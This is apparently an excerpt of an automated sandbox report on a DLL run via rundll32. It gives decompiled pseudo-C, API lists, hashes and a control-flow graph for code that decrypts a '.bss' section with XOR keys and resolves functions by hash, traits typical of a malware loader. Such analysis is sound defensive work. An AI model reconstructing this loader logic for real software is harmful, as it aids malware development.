                  				if (__rdx == _t57) goto 0x80001304;
                  				if (r8d == 0) goto 0x80001304;
                  				EnterCriticalSection(??);
                  				asm("lock add dword [esi+0x40], 0x1");
                  				LeaveCriticalSection(??);
                  				_t7 =  &_a8; // -110
                  				r8d = 0;
                  				_v48 = 0;
                  				_a8 = 0;
                  				_v56 = _t57;
                  				if (E00000001180009994(r12d, __rdx, __rdx, _t68, _t7) != 0x7a) goto 0x800012fd;
                  				r8d = _a8;
                  				HeapAlloc(??, ??, ??);
                  				_t58 = _t43;
                  				if (_t43 == 0) goto 0x800012f8;
                  				_v48 = 0x10;
                  				_t14 =  &_a8; // -110
                  				_t73 = _t14;
                  				_v56 = __rcx + 0x72;
                  				if (E00000001180009994(r12d, _t75, _t56, _t43, _t73) != 0) goto 0x800012e8;
                  				 *__r9 = _t58;
                  				 *_a40 = _a8;
                  				goto 0x800012fd;
                  				HeapFree(??, ??, ??);
                  				goto 0x800012fd;
                  				asm("lock add dword [esi+0x40], 0xffffffff");
                  				goto 0x80001313;
                  				 *_t73 = _t58;
                  				 *_a40 = 0;
                  				return 0;
                  			}











                  0x180001208
                  0x180001208
                  0x18000120d
                  0x180001212
                  0x180001224
                  0x180001237
                  0x18000123a
                  0x180001243
                  0x18000124c
                  0x180001256
                  0x18000125c
                  0x180001265
                  0x18000126b
                  0x180001270
                  0x180001279
                  0x18000127d
                  0x180001281
                  0x180001290
                  0x180001292
                  0x18000129c
                  0x1800012a2
                  0x1800012a8
                  0x1800012ae
                  0x1800012b6
                  0x1800012b6
                  0x1800012bb
                  0x1800012d2
                  0x1800012e0
                  0x1800012e4
                  0x1800012e6
                  0x1800012f0
                  0x1800012f6
                  0x1800012fd
                  0x180001302
                  0x18000130c
                  0x180001311
                  0x180001331

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterFreeLeave
                  • String ID:
                  • API String ID: 2939682908-0
                  • Opcode ID: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
                  • Instruction ID: a0890feeee0316dd0af96136dbcc6cf79a7537e396d31e91aa434a41704444e3
                  • Opcode Fuzzy Hash: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
                  • Instruction Fuzzy Hash: 6D314232204B88C7D761CB5AE84439AF7A4F79CBD4F548115EE9983B64DF38C64ACB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E000000011800081F0(void* __edx, long long __rbx, signed short* __rcx, long long __rsi, signed int** __r8, intOrPtr* __r9, void* __r11) {
                  				signed int _t21;
                  				signed int _t28;
                  				signed int* _t38;
                  				int _t53;
                  				long long _t58;
                  				void* _t61;
                  				void* _t72;
                  				signed int* _t73;
                  				long _t75;
                  				long _t78;
                  				void* _t81;
                  
                  				 *((long long*)(_t61 + 8)) = __rbx;
                  				 *((long long*)(_t61 + 0x10)) = _t58;
                  				 *((long long*)(_t61 + 0x18)) = __rsi;
                  				_t21 =  *__rcx & 0x0000ffff;
                  				_t38 = __rbx + 4;
                  				r11d = __edx;
                  				r10d = 0x57;
                  				if (__r11 - _t38 <= 0) goto 0x800082e1;
                  				_t28 =  *(__rbx +  &(__rcx[1])) & 0x0000ffff;
                  				if (__r11 -  &(__rcx[2]) < 0) goto 0x800082e1;
                  				if (_t21 == 0) goto 0x800082e1;
                  				if (_t21 - 0x200 > 0) goto 0x800082e1;
                  				if (_t28 == 0) goto 0x800082e1;
                  				if (_t28 - 0x200 > 0) goto 0x800082e1;
                  				r15d = 0x404;
                  				HeapAlloc(_t81, _t78, _t75);
                  				_t73 = _t38;
                  				if (_t38 == 0) goto 0x800082db;
                  				memset(_t72, _t53);
                  				 *_t73 = (_t21 & 0x0000fff0) << 3;
                  				memcpy(??, ??, ??);
                  				memcpy(??, ??, ??);
                  				 *__r8 = _t73;
                  				 *__r9 = r15d;
                  				r10d = 0;
                  				goto 0x800082e1;
                  				r10d = 8;
                  				return r10d;
                  			}














                  0x1800081f0
                  0x1800081f5
                  0x1800081fa
                  0x180008213
                  0x18000821d
                  0x180008221
                  0x18000822a
                  0x180008236
                  0x18000823c
                  0x18000824b
                  0x180008253
                  0x180008260
                  0x180008264
                  0x180008268
                  0x18000826a
                  0x180008278
                  0x18000827e
                  0x180008284
                  0x18000828e
                  0x1800082b0
                  0x1800082b4
                  0x1800082ca
                  0x1800082cf
                  0x1800082d2
                  0x1800082d6
                  0x1800082d9
                  0x1800082db
                  0x180008300

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memcpy$AllocHeapmemset
                  • String ID:
                  • API String ID: 609429373-0
                  • Opcode ID: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
                  • Instruction ID: 28a7b8e95bc2ced4d8e1beef03e6e9b8fa3c41881149a4efc87acd56f6b93b28
                  • Opcode Fuzzy Hash: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
                  • Instruction Fuzzy Hash: AA21E072204B9881EB95CF57E84039A7690FB89FC4F04C425FE8A17355EE38C759C308
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memcpy$AllocHeaplstrlen
                  • String ID:
                  • API String ID: 2888080719-0
                  • Opcode ID: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
                  • Instruction ID: d7cda782a7b16298d0386595c53ef50d9ac6af49b43f80025cb93dadd90a3a02
                  • Opcode Fuzzy Hash: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
                  • Instruction Fuzzy Hash: 83219E72300B9891DB56DF17A9813E9B3A1F78CBD4F498521AE490B799DE38C68AC300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CA7
                  • memset.NTDLL(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CC1
                    • Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                  • HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CED
                  • InitializeCriticalSection.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008D3E
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocHeap$CriticalInitializeLibraryLoadSectionmemset
                  • String ID:
                  • API String ID: 2387776105-0
                  • Opcode ID: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
                  • Instruction ID: 4870de9647b4eba85a0def977afe88a726f62592237ec59ed4fc2a31fcf765aa
                  • Opcode Fuzzy Hash: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
                  • Instruction Fuzzy Hash: 80315036200B5896EB56CF12E8143DA77A5F79CBD4F888126EE8D83795EF38D609C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocHeap_snprintflstrcpylstrlen
                  • String ID:
                  • API String ID: 2416262065-0
                  • Opcode ID: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
                  • Instruction ID: cd8941c1faf9c1b72c5725e61722f5b4f1580fba6f0a1dbc367b270ebdb23bd2
                  • Opcode Fuzzy Hash: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
                  • Instruction Fuzzy Hash: 83316B36604B888BD7A5CF16E454B9AB7A5F38CBC4F048126EE9E83714DF39D545CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: FreeHeap$ErrorLast
                  • String ID:
                  • API String ID: 2332451156-0
                  • Opcode ID: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
                  • Instruction ID: 57d54ecd6ba6b12e4082159e9fbcbac62f64b62c5c275490acec5f9711af8689
                  • Opcode Fuzzy Hash: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
                  • Instruction Fuzzy Hash: D5215E72200B8882EB97DB63D5413A973A5EB8DFC4F589115EE4D93799DF38CA89C300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalSection$AllocEnterHeapLeavememcpy
                  • String ID:
                  • API String ID: 224082080-0
                  • Opcode ID: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
                  • Instruction ID: 6c58b3867655a66680f731ed639b6ca29fd0989e7b58f2a4007a8aeeb493b1ec
                  • Opcode Fuzzy Hash: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
                  • Instruction Fuzzy Hash: 20112672604B5886E751CF02F888B9AB774F398BD5F958012EA9D43B54DF38C68AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocHeaplstrlenmemcpymemset
                  • String ID:
                  • API String ID: 422472530-0
                  • Opcode ID: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
                  • Instruction ID: bc1187ca6e9429620bd200782e7290a68718eb3a581ccfc4400d3cdfedcb2126
                  • Opcode Fuzzy Hash: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
                  • Instruction Fuzzy Hash: 49014832214B8886EB45DF26A84039977A2F78CFC0F498121EE5943B15DF38E655C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 18000508c-1800050da HeapAlloc 1 180005419 0->1 2 1800050e0-180005112 memset InitializeCriticalSection call 180008b44 0->2 4 18000541e-18000543a 1->4 6 180005118-180005131 call 180007678 call 18000459c 2->6 7 18000540f-180005417 call 180005578 2->7 14 180005133-180005142 6->14 15 180005144 6->15 7->4 16 180005147-18000514e 14->16 15->16 17 18000515b-180005184 HeapAlloc 16->17 18 180005150-180005156 GetLastError 16->18 21 180005226 17->21 22 18000518a-1800051b0 RegOpenKeyW 17->22 20 180005408-18000540d 18->20 20->4 20->7 25 18000522b-18000522e 21->25 23 1800051b2-1800051b4 22->23 24 180005216-180005224 HeapFree 22->24 27 1800051cf-1800051ec RegEnumKeyW 23->27 24->25 25->7 26 180005234-180005280 memcpy call 180005ca4 25->26 35 180005282-18000529a call 180005ca4 26->35 36 18000529c-18000529f 26->36 29 1800051b6-1800051ca call 180009110 27->29 30 1800051ee-1800051f7 27->30 29->30 40 1800051cc 29->40 33 180005203-180005214 RegCloseKey 30->33 34 1800051f9-180005200 30->34 33->24 33->26 34->33 35->36 36->7 39 1800052a5-1800052b6 call 180006dcc 36->39 44 1800052e2-1800052e5 39->44 45 1800052b8-1800052cc call 180003c24 39->45 40->27 44->7 46 1800052eb-1800052ee call 180008708 44->46 45->44 51 1800052ce-1800052de call 180003c24 45->51 50 1800052f3-1800052f6 46->50 52 180005302-180005323 50->52 53 1800052f8-1800052fd 50->53 51->44 55 180005325-18000532d 52->55 56 180005339 52->56 53->7 58 18000533c-18000533f 55->58 59 18000532f-180005337 call 180004ed8 55->59 56->58 61 180005341-180005346 58->61 62 18000534b-180005355 58->62 59->58 61->7 64 180005357-18000535f 62->64 65 18000536e 62->65 66 180005371-180005374 64->66 67 180005361-18000536c call 180004ed8 64->67 65->66 66->61 69 180005376-180005391 GetModuleHandleA 66->69 67->66 71 180005393-1800053a7 call 18000459c 69->71 72 1800053fb-180005403 call 180002b60 69->72 76 1800053a9-1800053bc GetCurrentThreadId 71->76 77 1800053be 71->77 72->20 78 1800053c1-1800053c4 76->78 77->78 78->18 80 1800053ca-1800053db call 18000459c 78->80 83 1800053dd-1800053ec 80->83 84 1800053ee 80->84 85 1800053f1-1800053f4 83->85 84->85 85->4 87 1800053f6 85->87 87->18
                  C-Code - Quality: 50%
                  			E0000000118000508C(void* __ecx, void* __esi, long long __rax, long long __rbx, long long __rcx, void* __r9) {
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				long _t55;
                  				long _t57;
                  				void* _t65;
                  				void* _t114;
                  				void* _t115;
                  				long long* _t146;
                  				void* _t147;
                  				void* _t153;
                  				int _t188;
                  				long long _t189;
                  				int _t191;
                  				long long _t192;
                  				struct _CRITICAL_SECTION* _t198;
                  				void* _t201;
                  				void* _t202;
                  				signed short* _t211;
                  				void* _t214;
                  				void* _t215;
                  				long long _t216;
                  				void* _t217;
                  				long _t219;
                  				long _t223;
                  				void* _t225;
                  
                  				_t154 = __rbx;
                  				_t146 = __rax;
                  				_t115 = __esi;
                  				 *((long long*)(_t201 + 0x20)) = __rbx;
                  				 *((long long*)(_t201 + 8)) = __rcx;
                  				_t202 = _t201 - 0x230;
                  				_t199 =  *0x8000d4a0;
                  				r14d =  *0x8000d498;
                  				HeapAlloc(_t225, _t223, _t219);
                  				r12d = 0;
                  				_t189 = __rax;
                  				if (__rax == _t217) goto 0x80005419;
                  				memset(_t217, _t188, _t191);
                  				InitializeCriticalSection(_t198);
                  				_t5 = _t189 + 0x98; // 0x98
                  				_t216 = _t5;
                  				 *_t216 = _t216;
                  				 *((long long*)(__rax + 0xa0)) = _t216;
                  				if (E00000001180008B44(__ecx, __rax - _t217, __rax, __rbx, _t191, __rbx, _t214) != r12d) goto 0x8000540f;
                  				E00000001180007678(__ecx, __rax, _t154, _t191);
                  				E0000000118000459C(0xdc444c2b, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t146 == _t217) goto 0x80005144;
                  				r9d = 0;
                  				r8d = 0;
                  				 *_t146();
                  				goto 0x80005147;
                  				_t147 = _t217;
                  				 *(_t189 + 0x28) = _t147;
                  				if (_t147 != _t217) goto 0x8000515b;
                  				GetLastError();
                  				goto 0x80005408;
                  				r8d = 0x1102;
                  				HeapAlloc(??, ??, ??);
                  				_t192 =  *0x8000d4a0;
                  				if (_t192 == _t217) goto 0x80005226;
                  				 *_t192 = r12w; // executed
                  				_t55 = RegOpenKeyW(??, ??, ??); // executed
                  				if (_t55 != r12d) goto 0x80005216;
                  				goto 0x800051cf;
                  				r12d = r12d + 1;
                  				if (E00000001180009110(0x180000000, _t154, _t192, _t202 + 0x20, _t192, _t202 + 0x278, _t214) != 0) goto 0x800051ee;
                  				r9d = 0x104; // executed
                  				_t57 = RegEnumKeyW(??, ??, ??, ??); // executed
                  				if (_t57 == 0) goto 0x800051b6;
                  				r12d = 0;
                  				if (_t57 != 0x103) goto 0x80005203;
                  				 *0x8000d480 = _t192;
                  				RegCloseKey(??); // executed
                  				if (r12d == r12d) goto 0x80005234;
                  				HeapFree(??, ??, ??);
                  				goto 0x8000522b;
                  				if (8 != r12d) goto 0x8000540f;
                  				_t193 =  *0x8000d490;
                  				r8d = 8;
                  				memcpy(??, ??, ??);
                  				 *((intOrPtr*)(_t202 + 0x286)) = r12w;
                  				if (E00000001180005CA4(8, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x180011198) == r12d) goto 0x8000529c;
                  				if (E00000001180005CA4(_t61, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x1800111f0) != r12d) goto 0x8000540f;
                  				_t28 = _t189 + 8; // 0x8
                  				_t186 = _t28;
                  				if (E00000001180006DCC(_t154, _t189, _t28, _t189, _t193) != r12d) goto 0x800052e2;
                  				E00000001180003C24(_t154, _t189, _t28, _t189, _t193,  *0x8000d4a0);
                  				 *((long long*)(_t189 + 0x30)) = 0x180000000;
                  				if (0x180000000 == _t217) goto 0x800052e2;
                  				_t30 = _t189 + 8; // 0x8
                  				_t65 = E00000001180003C24(_t154, _t30, _t28, _t189, _t193,  *0x8000d4a0);
                  				 *((long long*)(_t189 + 0x38)) = 0x180000000;
                  				_t90 =  !=  ? r12d : 8;
                  				_t132 = ( !=  ? r12d : 8) - r12d;
                  				if (( !=  ? r12d : 8) != r12d) goto 0x8000540f;
                  				if (E00000001180008708(_t65, _t114, _t154, _t189, _t186) != r12d) goto 0x80005302;
                  				goto 0x8000540f;
                  				_t211 =  *0x8000d490 + 0x18000f000;
                  				r9d = _t211[1] & 0x0000ffff;
                  				r11d =  *_t211 & 0x0000ffff;
                  				_t215 = __r9 + 8;
                  				if (_t216 - _t215 <= 0) goto 0x80005339;
                  				if ((r14d ^ 0xe49a1e6d) == r12d) goto 0x8000533c;
                  				E00000001180004ED8(r14d ^ 0xe49a1e6d, __r9 +  &(_t211[4]));
                  				goto 0x8000533c;
                  				if (_t217 != _t217) goto 0x8000534b;
                  				goto 0x8000540f;
                  				r14d = r14d ^ 0xecb028fc;
                  				if (_t216 - _t215 <= 0) goto 0x8000536e;
                  				if (r14d == r12d) goto 0x80005371;
                  				E00000001180004ED8(r14d, __r9 +  &(_t211[4]));
                  				goto 0x80005371;
                  				_t153 = _t217;
                  				if (_t153 == _t217) goto 0x80005341;
                  				 *(_t189 + 0x40) = _t211;
                  				 *0x8000d488 = _t189;
                  				GetModuleHandleA(??);
                  				if (_t153 ==  *((intOrPtr*)(_t202 + 0x270))) goto 0x800053fb;
                  				E0000000118000459C(0xaade337c, _t153,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t153 == _t217) goto 0x800053be;
                  				r8d = GetCurrentThreadId();
                  				 *_t153();
                  				goto 0x800053c1;
                  				if (_t217 == _t217) goto 0x80005150;
                  				E0000000118000459C(0x1c8cff93, _t153,  *((intOrPtr*)(_t199 + 0x18)));
                  				if (_t153 == _t217) goto 0x800053ee;
                  				 *_t153();
                  				goto 0x800053f1;
                  				if (r12d != r12d) goto 0x8000541e;
                  				goto 0x80005150;
                  				asm("lock add dword [ebp+0x38], 0x1");
                  				if (E00000001180002B60(_t115, _t189, __r9, _t215, _t216) == r12d) goto 0x8000541e;
                  				E00000001180005578(_t154, _t189, _t217);
                  				goto 0x8000541e;
                  				return 8;
                  			}





























                  0x18000508c
                  0x18000508c
                  0x18000508c
                  0x18000508c
                  0x180005091
                  0x1800050a1
                  0x1800050a8
                  0x1800050b6
                  0x1800050cb
                  0x1800050d1
                  0x1800050d4
                  0x1800050da
                  0x1800050e8
                  0x1800050f1
                  0x1800050f7
                  0x1800050f7
                  0x1800050fe
                  0x180005101
                  0x180005112
                  0x18000511b
                  0x180005129
                  0x180005131
                  0x180005138
                  0x18000513b
                  0x180005140
                  0x180005142
                  0x180005144
                  0x180005147
                  0x18000514e
                  0x180005150
                  0x180005156
                  0x180005164
                  0x180005171
                  0x180005177
                  0x180005184
                  0x1800051a1
                  0x1800051a5
                  0x1800051b0
                  0x1800051b4
                  0x1800051be
                  0x1800051ca
                  0x1800051dc
                  0x1800051e2
                  0x1800051ec
                  0x1800051ee
                  0x1800051f7
                  0x1800051f9
                  0x18000520b
                  0x180005214
                  0x18000521e
                  0x180005224
                  0x18000522e
                  0x180005234
                  0x180005248
                  0x18000524e
                  0x18000526d
                  0x180005280
                  0x18000529f
                  0x1800052a5
                  0x1800052a5
                  0x1800052b6
                  0x1800052c0
                  0x1800052c5
                  0x1800052cc
                  0x1800052ce
                  0x1800052d2
                  0x1800052da
                  0x1800052de
                  0x1800052e2
                  0x1800052e5
                  0x1800052f6
                  0x1800052fd
                  0x180005302
                  0x18000530d
                  0x180005312
                  0x18000531c
                  0x180005323
                  0x18000532d
                  0x180005332
                  0x180005337
                  0x18000533f
                  0x180005346
                  0x18000534b
                  0x180005355
                  0x18000535f
                  0x180005367
                  0x18000536c
                  0x18000536e
                  0x180005374
                  0x180005378
                  0x18000537c
                  0x180005383
                  0x180005391
                  0x18000539c
                  0x1800053a7
                  0x1800053b4
                  0x1800053b7
                  0x1800053bc
                  0x1800053c4
                  0x1800053d3
                  0x1800053db
                  0x1800053ea
                  0x1800053ec
                  0x1800053f4
                  0x1800053f6
                  0x1800053fb
                  0x18000540d
                  0x180005412
                  0x180005417
                  0x18000543a

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: HandleModule$Heap$AllocErrorLast$CloseCriticalCurrentEnumFreeInitializeOpenSectionThreadmemcpymemset
                  • String ID:
                  • API String ID: 2014251338-0
                  • Opcode ID: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
                  • Instruction ID: 9261d350846713a6d61e62943f4705d1cd3b2ba236d4958cf944a875f2eb3085
                  • Opcode Fuzzy Hash: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
                  • Instruction Fuzzy Hash: 1AA15C32204B4D92EAE6DB22E4953EE7391B78C7C5F50C421EA8A47795DE78CB9DC301
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorFileLast$CloseCreateDirectoryHandleInitQueryStringUnicode
                  • String ID:
                  • API String ID: 2375947951-0
                  • Opcode ID: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
                  • Instruction ID: 86e8c0801eecd6214d3de86c7c9a3f36e2355b629a028b10123d7888b335a31b
                  • Opcode Fuzzy Hash: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
                  • Instruction Fuzzy Hash: A5319E72214B8486D7A1CF15E45439E77A1F78CBD4F588626EAAD43B88DF38CA48CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 38%
                  			E00000001180004F1C(long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r11) {
                  				intOrPtr _t22;
                  				intOrPtr _t23;
                  				void* _t46;
                  				long long _t56;
                  				void* _t72;
                  				intOrPtr* _t75;
                  				intOrPtr* _t76;
                  				long long _t80;
                  				long long _t82;
                  				void* _t83;
                  				long long _t85;
                  				void* _t91;
                  				void* _t92;
                  				long _t93;
                  				long _t95;
                  				long _t97;
                  
                  				_t92 = __r11;
                  				_t56 = _t85;
                  				 *((long long*)(_t56 + 8)) = __rbx;
                  				 *((long long*)(_t56 + 0x10)) = _t82;
                  				 *((long long*)(_t56 + 0x18)) = __rsi;
                  				 *((long long*)(_t56 + 0x20)) = __rdi;
                  				_t83 = __rcx;
                  				r8d = 0;
                  				HeapCreate(_t97, _t95, _t93); // executed
                  				_t80 = _t56;
                  				if (_t56 == 0) goto 0x8000506b;
                  				_t72 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
                  				_t75 = _t56 + _t72 + 0x68;
                  				_t22 =  *_t75;
                  				if (_t22 == 0) goto 0x80004ffc;
                  				if (_t22 == 0x7373622e) goto 0x80004f8a;
                  				_t76 = _t75 + 0x28;
                  				_t23 =  *_t76;
                  				if (_t23 != 0) goto 0x80004f79;
                  				if (_t23 == 0) goto 0x80004ffc;
                  				r13d =  *(_t76 + 0x10);
                  				r12d =  *(_t76 + 0x14);
                  				r12d = r12d ^  *(_t72 + 8);
                  				r12d = r12d ^ r13d;
                  				HeapAlloc(??, ??, ??);
                  				if (_t56 == 0) goto 0x80004ff5;
                  				r9d = r12d;
                  				r8d = r13d;
                  				E00000001180002524(_t56, __rbx, _t56, _t72 + __rcx, _t80);
                  				r11d =  *((intOrPtr*)(_t76 + 0xc));
                  				 *0x8000d490 = _t56 - _t92 - _t83;
                  				 *0x8000d498 = E00000001180001B48(_t56, _t56 - _t92 - _t83 + 0x80011040);
                  				goto 0x80005001;
                  				goto 0x80005001;
                  				if (2 == 0) goto 0x80005010;
                  				HeapDestroy(??);
                  				goto 0x8000506b;
                  				HeapAlloc(??, ??, ??);
                  				if (0x80011040 != 0) goto 0x80005049;
                  				HeapDestroy(??);
                  				goto 0x8000506b;
                  				0x8000236a();
                  				 *0x180011048 = _t80;
                  				 *0x8000d4a0 = 0x80011040;
                  				return E0000000118000508C(0, _t46, 0x80011040, 0x80011040, _t83, _t91);
                  			}



















                  0x180004f1c
                  0x180004f1c
                  0x180004f1f
                  0x180004f23
                  0x180004f27
                  0x180004f2b
                  0x180004f39
                  0x180004f3c
